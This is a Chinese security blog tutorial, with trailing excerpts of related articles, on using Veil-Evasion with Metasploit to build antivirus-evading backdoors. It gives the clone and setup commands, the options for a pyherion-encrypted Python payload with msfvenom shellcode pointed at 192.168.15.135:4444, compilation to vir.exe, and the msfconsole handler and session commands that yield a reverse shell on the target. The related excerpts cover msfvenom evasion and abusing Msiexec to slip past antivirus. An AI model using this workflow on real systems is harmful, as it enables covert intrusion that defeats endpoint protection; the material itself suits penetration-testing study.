免杀后门之MSF&Veil-Evasion的完美结合

本文由“即刻安全”投稿到“玄魂工作室”

Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载:

git clone https://www.github.com/Veil-Framework/Veil-Evasion.git

图1

下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令:

ls
cd Veil-Evasion/
ls
cd setup/
ls
./setup.sh

(该shell脚本将自动为我们安装软件配置包)

图2

当安装至如下位置时,会询问我们是否继续安装,我们输入 Y 继续!

图3

此时跳出 python for windows 的安装界面,我们点击 next 即可。

图4

点击 next 选择 yes 继续安装。

图5

继续 next !

图6

这里安装 pywin32-219 我们直接 下一步。

图7

这里依然 下一步 。

图8

安装 ruby 环境,我们选择 accept ,并 next 。

图9

这里我们全选中复选框,并点击 install 开始安装!

图10

在以上一系列繁杂的安装过程后下面我们就可以来正常使用 Veil-Evasion 啦!我们进入到 Veil-Evasion目录下,执行如下命令:

python Veil-Evasion.py

图11

成功进入到菜单界面,可以看到当前一共有 51 种 payload 可用!我们可以使用 list 命令来查看 payload 的详细信息!根据 payload 编号,这里我选择 35号的 python payload进行演示!

图12

在这个界面,我们可以对该 payload 进行一些基本的配置。例如:编译后生成文件的格式有效期,并是否进行加密做出配置。这里我选择使用 pyherion 进行加密!

set USE_PYHERION Y
generate (生成payload)

图13

这个界面要求我们,选择一种生成 shellcode 的模板文件。我们就按照默认的选择 msfvenom  1 。

IP :192.168.15.135
PORT :4444

图14

这个界面要求我们,对生成的 payload 进行命名和可执行性的编译。我随便命名为 vir 并选择 免杀效果更好的第 2种方式进行编译!

图15

成功完成以上编译后,编译后的文件被保存在 /usr/share/veil-output/compiled/vir.exe 下。

图16

同时新生成的 shellcode 的 rc 文件也被保存在了 veil-output下的 handlers目录下!既然有了 rc 文件,那么我们就可以方便的利用 MSF 进行调用了!

msfconsole -r vir_handler.rc

图17

此时当目标系统上成功运行我们生成的 shellcode 后,我们将在 kali 上取得目标系统的反弹 shell !

sessions -i 2

shell

图18

--------------------------------------------------------------------------------------------------------------------------------

即刻安全是一个专注于网络安全的研究学习平台。致力于为网络安全爱好者,打造氛围良好的技术交流学习领地!本着最初的理念,为广大读者用户提供最前言的技术文章分享,及安全事件的跟踪报导等资讯!站长信箱: Eternal#secist.com官方Q群: 532925486,官方订阅号

关注即刻安全订阅号或者加入其官方qq群,请注明来自“玄魂工作室”,有惊喜哦!

玄魂工作室愿意和坚持原创的其他团队和组织一起为广大读者贡献越来越优质的内容。也愿意公益宣传初创的IT团队和组织,共同成长。虽然我们还不够强大,但是愿意贡献一点微薄之力。

更多精彩内容请关注“玄魂工作室”官方微信订阅号(xuanhun521,下方二维码)。问题讨论请加qq群:Hacking (1群):303242737   Hacking (2群):147098303。

玄魂工作室-精彩不断

时间: 2024-10-08 15:34:48

免杀后门之MSF&Veil-Evasion的完美结合的相关文章

Kail Linux渗透测试教程之免杀Payload生成工具Veil

Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: root@kali :~# apt-get update &&am

Metasploit制作免杀后门-----msfvenom

真正全部免杀是不会的,部分还是可以,主要是介绍msfvenom.-----现在依然还有很多教学视频.资料是使用之前的kali版本.随着更新有些命令是不适应最新的kali的.(也是掉过坑的人)msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项.再按照某些教程输后两个命令是不行的. msfvenom重要参数:(可以使用msfvenom -h查看所有参数)-p payload设置 -e 编码设置-a 系统结构,默认x86-s payload最大大小-i 编码次数

基于白名单的免杀后门(1)

通过使用系统的一些服务进程完成Shell反弹,由于系统进程多数具有微软特征,所以自带免杀,杀毒软件都会默认放行 利用Msiexec进程反弹 Msiexec是Windows Installer的一部分.用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大.并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便. 原文地址:https

Kali-linux免杀Payload生成工具Veil

Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: [email protected]:~# apt-get install veil 执行以上命令后,如果安装过程没有提示错误的话,则表示Veil工具安装成功.由于安装该工具依赖的软件较多,所以此过程时间有点长. 启动Veil工具.执行命令如下所

利用meterpreter下的Venom免杀后门

转载请注明作者:admin-神风 下载地址:https://github.com/r00t-3xp10it/venom 1.从Github上下载框架: tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh sudo chmod -R +x *.py 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo ./venom.sh 目标机:win7 sp1  ip:192.

20165306 Exp3 免杀原理与实践

Exp3 免杀原理与实践 一.实践内容概述 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 4.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. AV软

20165310 NetSec2019 Week5 Exp3 免杀原理与实践

20165310 NetSec2019 Week5 Exp3 免杀原理与实践 一.免杀原理 杀软是如何检测出恶意代码的 基于特征码的检测:特征码就是一段恶意程序有但是正常程序没有的一段代码,当杀软检测到一个程序里有和特征码库中匹配的特征码,就会将它作为恶意程序处理. 启发式恶意软件检测:杀软根据程序的片面特征去推断其是否包含恶意代码,通常缺乏精确判定依据. 基于行为的恶意软件检测:是加入了行为监控的启发式检测,更加精确.当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,例如修改

2019-2020-2 20175326 李一潇《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175326李一潇<网络对抗技术> Exp3 免杀原理与实践 一.实验内容 免杀尝试 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.实验原理 Virscan:集成了60多个商业杀毒软件的扫描引擎.可以上传免杀处理过的程序进行检测.是此次实验用到的检查方

2018-2019-2 20165114《网络对抗技术》Exp3 免杀原理与实践

Exp3 免杀原理与实践 目录 一.实验内容 二.基础问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 三.实践过程记录 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧: 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 四.实验总结与体会 五.开启杀软能绝对防止电脑中恶意代码吗? 一.实验